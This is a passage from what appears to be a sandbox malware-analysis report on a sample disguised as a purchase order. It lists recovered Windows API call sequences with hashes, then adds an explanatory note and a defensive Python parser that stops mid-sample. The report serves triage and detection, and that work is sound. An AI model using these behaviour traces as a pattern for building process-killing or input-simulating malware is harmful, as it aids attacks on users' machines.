                                                                                                              • Opcode Fuzzy Hash: 8e248bb8f5fd4276b5020b39bc0357d628bafd94b78c20242387fb81284dc6af
                                                                                                              • Instruction Fuzzy Hash: 5451D470B01269DBCF20CF69E888BAEBFF4EF84358F54411AE4159A290D3B89940CB59
                                                                                                              APIs
                                                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0047DC00), ref: 00438E7C
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438E89
                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00438EAD
                                                                                                               • #16.WSOCK32(?,?,00000000,00000000), ref: 00438EC5 (wsock32 ordinal 16 = recv)
                                                                                                              • _strlen.LIBCMT ref: 00438EF7
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438F6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_strlenselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217125717-0
                                                                                                              • Opcode ID: 7e62dfaf5d42950793747a5d0f4b2bb5db23cd8ed910281df2d132b4254802f9
                                                                                                              • Instruction ID: 5ccd522ebab3ecd61b94a008b61c79740cdefce965027be3699bef2f1ba519e2
                                                                                                              • Opcode Fuzzy Hash: 7e62dfaf5d42950793747a5d0f4b2bb5db23cd8ed910281df2d132b4254802f9
                                                                                                              • Instruction Fuzzy Hash: 7841C371A00204AFCB14EB65CD86EAEB7B9AF0C314F10466EF51A972D1DF74AE00CB65
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • BeginPaint.USER32(?,?,?), ref: 003FAC2A
                                                                                                              • GetWindowRect.USER32(?,?), ref: 003FAC8E
                                                                                                              • ScreenToClient.USER32(?,?), ref: 003FACAB
                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003FACBC
                                                                                                              • EndPaint.USER32(?,?,?,?,?), ref: 003FAD06
                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0045E673
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                              • String ID:
                                                                                                              • API String ID: 2592858361-0
                                                                                                              • Opcode ID: 55143812b8846ce8313e4410c861311100ec0e52495a36166a56116b2010d1ed
                                                                                                              • Instruction ID: 52e6f9e1a4ba604f2b562386cfa2b8e0ae081ce3f9cfd3365522978c25ac82f0
                                                                                                              • Opcode Fuzzy Hash: 55143812b8846ce8313e4410c861311100ec0e52495a36166a56116b2010d1ed
                                                                                                              • Instruction Fuzzy Hash: B741C2B05007059FC711DF15CC84F7B7BA8EB5A360F040229FAA8C72B1D7749945DB66
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(004A1628,00000000,004A1628,00000000,00000000,004A1628,?,0045DC5D,00000000,?,00000000,00000000,00000000,?,0045DAD1,00000004), ref: 0044E40B
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0044E42F
                                                                                                              • ShowWindow.USER32(004A1628,00000000), ref: 0044E48F
                                                                                                              • ShowWindow.USER32(00000000,00000004), ref: 0044E4A1
                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0044E4C5
                                                                                                               • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0044E4E8 (0x130C = TCM_SETCURSEL, tab control)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 642888154-0
                                                                                                              • Opcode ID: dbf538ffee0a6ac4d7f107ebce4a3535e2260f8e1897febee977e17b8e53e598
                                                                                                              • Instruction ID: d750839cf408d11370cfb01eb3c7e7cfae3fbc568c245dc429c74eed2edc7f61
                                                                                                              • Opcode Fuzzy Hash: dbf538ffee0a6ac4d7f107ebce4a3535e2260f8e1897febee977e17b8e53e598
                                                                                                              • Instruction Fuzzy Hash: 2B417330A01140EFEB22CF26C499F957BE1BF09314F1941BAEA598F2A2C775E842CB55
                                                                                                              APIs
                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004298D1
                                                                                                                • Part of subcall function 003FF4EA: std::exception::exception.LIBCMT ref: 003FF51E
                                                                                                                • Part of subcall function 003FF4EA: __CxxThrowException@8.LIBCMT ref: 003FF533
                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00429908
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00429924
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0042999E
                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004299B3
                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004299D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                              • String ID:
                                                                                                              • API String ID: 2537439066-0
                                                                                                              • Opcode ID: daf9b6a3a83fbf137f4c8baf571c8f31b78f5d5ddc1242ac4d126fd4db393720
                                                                                                              • Instruction ID: b84382e03fb57d70fc0614481d82b8ac175fae831b951c641e5acc4946ff033d
                                                                                                              • Opcode Fuzzy Hash: daf9b6a3a83fbf137f4c8baf571c8f31b78f5d5ddc1242ac4d126fd4db393720
                                                                                                              • Instruction Fuzzy Hash: CE319E71E00205AFDB00AFA5DD85EABB778FF45310F1480BAE904AB246E774DE10CBA5
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,004377F4,?,?,00000000,00000001), ref: 00439B53
  • Part of subcall function 00436544: GetWindowRect.USER32(?,?), ref: 00436557
• GetDesktopWindow.USER32 ref: 00439B7D
• GetWindowRect.USER32(00000000), ref: 00439B84
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00439BB6
  • Part of subcall function 00427A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427AD0
• GetCursorPos.USER32(?), ref: 00439BE2
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00439C44
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 479a43ac737b961f04efe21cfa30066e905330872d86edd25b13af11830a4cee
• Instruction ID: 33bcf53fc8ce78c49d7b3bcd45bd942fcd92ece0646ed704509a4c79ac521061
• Opcode Fuzzy Hash: 479a43ac737b961f04efe21cfa30066e905330872d86edd25b13af11830a4cee
• Instruction Fuzzy Hash: 3131C172A04315ABD710DF14DC49F9BB7E9FF88314F00092AF595D7281DAB5E904CB96
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0041AFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 0041AFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0041AFC4
• CloseHandle.KERNEL32(00000004), ref: 0041AFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0041AFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 0041B012
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: a8722b723e5dd6261462c6236aa12d62fa89bca7d265d5a579f3467609dad9b6
• Instruction ID: 362120cd19681979349f7564d806c4fb3862b508cce9a2d5b266234b4931e5eb
• Opcode Fuzzy Hash: a8722b723e5dd6261462c6236aa12d62fa89bca7d265d5a579f3467609dad9b6
• Instruction Fuzzy Hash: 82215072905209AFDF018FA4DD09FEE7BA9EF44308F044026FD01A2261D379DDA5DB66
APIs
  • Part of subcall function 003FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003FAFE3
  • Part of subcall function 003FAF83: SelectObject.GDI32(?,00000000), ref: 003FAFF2
  • Part of subcall function 003FAF83: BeginPath.GDI32(?), ref: 003FB009
  • Part of subcall function 003FAF83: SelectObject.GDI32(?,00000000), ref: 003FB033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0044EC20
• LineTo.GDI32(00000000,00000003,?), ref: 0044EC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0044EC42
• LineTo.GDI32(00000000,00000000,?), ref: 0044EC52
• EndPath.GDI32(00000000), ref: 0044EC62
• StrokePath.GDI32(00000000), ref: 0044EC72
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: ee23967a136459cabe80698f6cdeeb7fed51f8e2b36b8d34274ab7a938715c30
• Instruction ID: c6b79ccbd03a07cfc343d373c5f3acbc79c76d7f5a86082dd3a8d5079aef4b87
• Opcode Fuzzy Hash: ee23967a136459cabe80698f6cdeeb7fed51f8e2b36b8d34274ab7a938715c30
• Instruction Fuzzy Hash: 3D11097290014DBFEB029F90DD88EEA7F6DEB09354F048122FE0989160D7B19D55DBA5
APIs
• GetDC.USER32(00000000), ref: 0041E1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0041E1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041E1D8
• ReleaseDC.USER32(00000000,00000000), ref: 0041E1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0041E1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 0041E209
  • Part of subcall function 00419AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00419A05,00000000,00000000,?,00419DDB), ref: 0041A53A
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
• Opcode ID: 5655475598f44c1d5217a29c8e09e4a4f43cdbdd6486f7f7e7dd9e451af03859
• Instruction ID: 26290a3b2d5e982af23d24ca08dbaf8b64f289bae65c8ba36aeea9785281fc90
• Opcode Fuzzy Hash: 5655475598f44c1d5217a29c8e09e4a4f43cdbdd6486f7f7e7dd9e451af03859
• Instruction Fuzzy Hash: B10184B5F00214BFEB109BA6CC45B5EBFB8EB48351F044066EE09A7390E6B09C00CB65
APIs
• __init_pointers.LIBCMT ref: 00407B47
  • Part of subcall function 0040123A: __initp_misc_winsig.LIBCMT ref: 0040125E
  • Part of subcall function 0040123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407F51
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00407F65
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00407F78
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00407F8B
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00407F9E
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00407FB1
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00407FC4
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00407FD7
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00407FEA
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00407FFD
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00408010
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00408023
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00408036
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00408049
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0040805C
  • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0040806F
• __mtinitlocks.LIBCMT ref: 00407B4C
  • Part of subcall function 00407E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0049AC68,00000FA0,?,?,00407B51,00405E77,00496C70,00000014), ref: 00407E41
• __mtterm.LIBCMT ref: 00407B55
  • Part of subcall function 00407BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00407B5A,00405E77,00496C70,00000014), ref: 00407D3F
  • Part of subcall function 00407BBD: _free.LIBCMT ref: 00407D46
  • Part of subcall function 00407BBD: DeleteCriticalSection.KERNEL32(0049AC68,?,?,00407B5A,00405E77,00496C70,00000014), ref: 00407D68
• __calloc_crt.LIBCMT ref: 00407B7A
• GetCurrentThreadId.KERNEL32 ref: 00407BA3
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
• String ID:
• API String ID: 2942034483-0
• Opcode ID: 9da07c6fb743f7523c1765c837c203529e176d54a7244bd25beef11088a777d5
• Instruction ID: 0c25899785580a9bd6e7af60ad399ce991e4db952022c35941b707c4a88133ef
• Opcode Fuzzy Hash: 9da07c6fb743f7523c1765c837c203529e176d54a7244bd25beef11088a777d5
• Instruction Fuzzy Hash: 0EF0C232E1D21119E6247636BC0664B36A09F0133CB2006BFF860F51D2FB7CB81244AF
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 003E281D
• MapVirtualKeyW.USER32(00000010,00000000), ref: 003E2825
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 003E2830
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 003E283B
• MapVirtualKeyW.USER32(00000011,00000000), ref: 003E2843
• MapVirtualKeyW.USER32(00000012,00000000), ref: 003E284B
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 600778f131887751708443533fd4ff12a708e1db5a3fab8814bbe61520e591d2
• Instruction ID: 17a028283580c1c31cac4438e6c47462fbd0ce29abfd8384df811e8179969f4c
• Opcode Fuzzy Hash: 600778f131887751708443533fd4ff12a708e1db5a3fab8814bbe61520e591d2
• Instruction Fuzzy Hash: 560167B0A02B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C47A42C7F5A864CBE5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 1423608774-0
                                                                                                              • Opcode ID: 62b6ceaab4bdeb601106f6acf59a9d37234847f890a9ff43b37f7c88b543b3a8
                                                                                                              • Instruction ID: 7923d0cf584a47794db22c5d9060793284823caaaeb3e18e8073edf10af3b71e
                                                                                                              • Opcode Fuzzy Hash: 62b6ceaab4bdeb601106f6acf59a9d37234847f890a9ff43b37f7c88b543b3a8
                                                                                                              • Instruction Fuzzy Hash: 29018632F01321ABD7155B55FC59DEB7769FF88701F44047AF50392194EBA89C00DB59
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00427C07
                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00427C1D
                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00427C2C
                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C3B
                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C45
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C4C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 839392675-0
                                                                                                              • Opcode ID: 65a6a1a96fb289657e5fc9f6bc5bb41e560d8ad946cbcc2ecc9bd6aa948d7d0c
                                                                                                              • Instruction ID: e38e3cc981ac08fc9b8de8a018ca08b000563801ea3e10a13d50fbb2f62cbdb1
                                                                                                              • Opcode Fuzzy Hash: 65a6a1a96fb289657e5fc9f6bc5bb41e560d8ad946cbcc2ecc9bd6aa948d7d0c
                                                                                                              • Instruction Fuzzy Hash: B3F03072B41158BBE7215752DC0DEEF7B7CDFC6B11F000029FA0191161E7E05A41C6BA
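                                                                                                              The record above is easier to read once the hex immediates are decoded: 0x10 is WM_CLOSE, 0x2 is SMTO_ABORTIFHUNG, 0x1F4 is a 500 ms timeout and 0x1F0FFF is PROCESS_ALL_ACCESS. The function asks the target window to close, waits briefly for it to comply, then resolves the owning process, opens it with full access and terminates it: a forced window close, consistent with the AutoIt runtime the report identifies, although the listing itself does not name the routine. The Python below is an added example, not code from the report or from AutoIt. It parses lines in the shape of this report's "APIs" lists (including the "Part of subcall function" form and calls printed without an argument list), decodes those constants and flags a record that sends WM_CLOSE and later calls TerminateProcess. The sample lines are copied from the record above; the function names parse_api_block, describe and forced_close_sequence are the example's own.

```python
"""Parse a Joe Sandbox 'APIs' listing and decode the constants behind a
WM_CLOSE -> TerminateProcess record.  Added example; not report or AutoIt code."""
import re
from dataclasses import dataclass
from typing import Optional, Union

# One bullet per call: "• Func.MODULE(args), ref: XXXXXXXX", optionally prefixed
# with "Part of subcall function XXXXXXXX:"; the argument list may be absent.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<func>[A-Za-z_][\w:@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")
Arg = Union[int, str, None]

# Values from winuser.h / winnt.h that the report prints as bare hex.
WM_CLOSE, SMTO_ABORTIFHUNG, PROCESS_ALL_ACCESS = 0x0010, 0x0002, 0x001F0FFF


@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: int                      # call-site address from the "ref:" field
    parent: Optional[int] = None  # set for "Part of subcall function" lines


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok in ("", "?"):
        return None               # '?' is Joe Sandbox's "could not resolve"
    if HEX8.match(tok):
        return int(tok, 16)       # 8-digit hex immediate
    return tok                    # string literal, e.g. DllGetClassObject


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [_parse_arg(t) for t in raw.split(",")]
    parent = m.group("parent")
    return ApiCall(m.group("func"), m.group("module"), args,
                   int(m.group("ref"), 16), int(parent, 16) if parent else None)


def parse_api_block(text: str) -> list:
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def describe(call: ApiCall) -> str:
    """Render the arguments that matter for triage with their symbolic names."""
    a = call.args
    if call.func in ("PostMessageW", "SendMessageTimeoutW") and len(a) > 1 and a[1] == WM_CLOSE:
        text = f"{call.func}: WM_CLOSE to target window"
        if call.func == "SendMessageTimeoutW" and len(a) > 5 and isinstance(a[5], int):
            flag = "SMTO_ABORTIFHUNG" if a[4] == SMTO_ABORTIFHUNG else f"flags={a[4]!r}"
            text += f" ({flag}, timeout {a[5]} ms)"
        return text
    if call.func == "OpenProcess" and a and a[0] == PROCESS_ALL_ACCESS:
        return "OpenProcess: PROCESS_ALL_ACCESS"
    return call.func


def forced_close_sequence(calls: list) -> Optional[tuple]:
    """(ref of first WM_CLOSE send, ref of TerminateProcess) when the record asks a
    window to close and then kills its process; None otherwise."""
    first_close = None
    for c in sorted(calls, key=lambda c: c.ref):
        if c.func in ("PostMessageW", "SendMessageTimeoutW") and len(c.args) > 1 and c.args[1] == WM_CLOSE:
            if first_close is None:
                first_close = c.ref
        elif c.func == "TerminateProcess" and first_close is not None:
            return first_close, c.ref
    return None


# Constructed sample: the six lines of the record above, as the report prints them.
SAMPLE = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00427C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00427C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 00427C2C
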